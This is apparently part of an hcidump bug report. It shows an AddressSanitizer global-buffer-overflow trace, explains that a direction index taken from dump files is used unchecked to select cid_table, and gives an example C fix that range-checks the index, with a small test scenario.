  0x0000800fe600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0000800fe610: 00 00[f9]f9 f9 f9 f9 f9 00 00 00 00 00 00 00 00
  0x0000800fe620: 00 00 00 00 00 00 00 00 00 00 00 00 01 f9 f9 f9
  0x0000800fe630: f9 f9 f9 f9 01 f9 f9 f9 f9 f9 f9 f9 04 f9 f9 f9
  0x0000800fe640: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 00 00 00
  0x0000800fe650: 00 00 00 00 04 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
  0x0000800fe660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Contiguous container OOB:fc
  ASan internal:           fe
==29456==ABORTING
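The set_ext_ctrl and set_mode reports share one cause that is easy to miss in the affected code: the loops themselves stay inside CID_TABLE_SIZE, but the table they walk is selected by cid_table[in], and ASan shows the write landing in unrelated globals ('frame_table' from sdp.c, 'table' from cmtp.c), which is what happens when the direction index lies beyond the two tables that exist. Any value used as an array index that originates in the dump file has to be range-checked first. The example below is an added illustration, not hcidump's code: it keeps the two-table layout and the lookup loops but refuses a direction outside 0..1. CID_TABLE_SIZE, the cid_info layout, and the "handle 0 / cid 0 means free slot" convention are assumptions made for this example, and the scenario data is constructed.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define CID_TABLE_SIZE 20   /* assumed size for this example */
#define CID_DIRS       2    /* one table per direction: 0 = outgoing, 1 = incoming */

typedef struct {
    uint16_t handle;
    uint16_t cid;
    uint8_t  mode;
    uint8_t  ext_ctrl;
} cid_info;

/* cid_table[in] with 'in' outside 0..1 points into whatever global happens
 * to follow this array, which is the write both ASan reports above show. */
static cid_info cid_table[CID_DIRS][CID_TABLE_SIZE];

/* 'in' comes from the dump record, so it is validated before use as an index. */
static int valid_dir(int in)
{
    return in >= 0 && in < CID_DIRS;
}

/* Returns the number of entries updated, or -1 if 'in' is out of range. */
static int set_mode_checked(int in, uint16_t handle, uint16_t cid, uint8_t mode)
{
    cid_info *table;
    int i, hits = 0;

    if (!valid_dir(in))
        return -1;
    table = cid_table[in];
    for (i = 0; i < CID_TABLE_SIZE; i++)
        if (table[i].handle == handle && table[i].cid == cid) {
            table[i].mode = mode;
            hits++;
        }
    return hits;
}

static int set_ext_ctrl_checked(int in, uint16_t handle, uint16_t cid, uint8_t ext_ctrl)
{
    cid_info *table;
    int i, hits = 0;

    if (!valid_dir(in))
        return -1;
    table = cid_table[in];
    for (i = 0; i < CID_TABLE_SIZE; i++)
        if (table[i].handle == handle && table[i].cid == cid) {
            table[i].ext_ctrl = ext_ctrl;
            hits++;
        }
    return hits;
}

/* Demo helpers: a slot with handle 0 and cid 0 is treated as free (assumption). */
static int add_cid_checked(int in, uint16_t handle, uint16_t cid)
{
    int i;

    if (!valid_dir(in))
        return -1;
    for (i = 0; i < CID_TABLE_SIZE; i++)
        if (cid_table[in][i].handle == 0 && cid_table[in][i].cid == 0) {
            cid_table[in][i].handle = handle;
            cid_table[in][i].cid = cid;
            return i;
        }
    return -1;                          /* table full */
}

static int get_mode_checked(int in, uint16_t handle, uint16_t cid)
{
    int i;

    if (!valid_dir(in))
        return -1;
    for (i = 0; i < CID_TABLE_SIZE; i++)
        if (cid_table[in][i].handle == handle && cid_table[in][i].cid == cid)
            return cid_table[in][i].mode;
    return -1;
}

/* Constructed scenario: one incoming channel, then updates with good and bad
 * direction values. Returns 1 if every result is as expected. */
static int run_scenario(void)
{
    memset(cid_table, 0, sizeof cid_table);
    if (add_cid_checked(1, 0x0040, 0x0041) < 0) return 0;
    if (set_mode_checked(1, 0x0040, 0x0041, 3) != 1) return 0;      /* updated once */
    if (get_mode_checked(1, 0x0040, 0x0041) != 3) return 0;
    if (set_mode_checked(0, 0x0040, 0x0041, 5) != 0) return 0;      /* no such outgoing channel */
    if (set_mode_checked(2, 0x0040, 0x0041, 5) != -1) return 0;     /* direction from file out of range */
    if (set_ext_ctrl_checked(255, 0x0040, 0x0041, 1) != -1) return 0;
    if (get_mode_checked(1, 0x0040, 0x0041) != 3) return 0;         /* untouched by the rejected writes */
    return 1;
}

int main(void)
{
    printf("scenario %s\n", run_scenario() ? "passed" : "failed");
    return run_scenario() ? 0 : 1;
}
```

Rejecting the direction at the entry point is cheaper than auditing every cid_table[in] site individually, and it turns the corrupted record into a logged parse error instead of a write into a neighbouring global.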